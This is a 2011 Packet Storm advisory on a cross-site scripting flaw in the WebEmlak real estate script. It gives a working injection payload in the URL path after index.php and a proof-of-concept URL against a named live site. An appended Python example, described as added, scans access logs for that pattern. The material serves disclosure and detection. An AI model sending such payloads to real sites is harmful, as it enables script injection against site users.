WebEmlak Real Estate Cross Site Scripting

2011-09-08T00:00:00
ID PACKETSTORM:104906
Type packetstorm
Reporter Eyup CELIK
Modified 2011-09-08T00:00:00

Description

                                        
`# Exploit Title: WebEmlak Real Estate Script Stored XSS  
# Date: 2011  
# Author: Eyup CELIK  
# Version: All versions  
# Tested on: All versions are vulnerable  
# Web Site: www.eyupcelik.com.tr  
  
  
ISSUE  
  
Cross-site scripting is possible through input appended to the URL path after index.php  
  
Vulnerable Page:  
index.php  
  
  
Example:  
index.php/<XSS Code>  
  
  
Exploit:  
index.php/"/></a></><img src=1.gif onerror=alert(1)>  
  
  
POC:  
http://www.webemlakofisi.com/portal2/index.php/%22/%3E%3C/a%3E%3C/%3E%3Cimg%20src=1.gif%20onerror=alert%281%29%3E  
`
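
A detection-side check for the request pattern shown in this advisory, added here as an example and not part of the original advisory: it percent-decodes the request path from access-log lines and flags HTML metacharacters in the path segment that follows a `.php` script name. The log lines, client addresses and function names are constructed for illustration, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import unquote, urlsplit

# Characters needed to close an HTML attribute or open a new tag.
HTML_META = re.compile(r'[<>"\']')
# Script name followed by extra path segments (PATH_INFO), e.g. /index.php/extra
SCRIPT_PATHINFO = re.compile(r'^(?P<script>.*?\.php)(?P<path_info>/.*)$', re.I | re.S)
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines; the second carries the PoC path from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Sep/2011:10:00:01 +0300] "GET /portal2/index.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [08/Sep/2011:10:00:02 +0300] "GET /portal2/index.php/%22/%3E%3C/a%3E%3C/%3E'
    '%3Cimg%20src=1.gif%20onerror=alert%281%29%3E HTTP/1.1" 200 5311',
    '203.0.113.9 - - [08/Sep/2011:10:00:03 +0300] "GET /portal2/index.php/listing/12 HTTP/1.1" 200 4990',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so nested encodings such as %253C are seen too."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value


def suspicious_path_info(target):
    """Return the decoded PATH_INFO if it holds HTML metacharacters, else None."""
    path = fully_decode(urlsplit(target).path)
    match = SCRIPT_PATHINFO.match(path)
    if match and HTML_META.search(match.group("path_info")):
        return match.group("path_info")
    return None


def scan(log_lines):
    """Return (client_ip, decoded_path_info) for every flagged request."""
    hits = []
    for line in log_lines:
        request = REQUEST_LINE.search(line)
        info = suspicious_path_info(request.group("target")) if request else None
        if info is not None:
            hits.append((line.split()[0], info))
    return hits


if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Query-string parameters are deliberately out of scope here; the check only covers the path-based input this advisory describes.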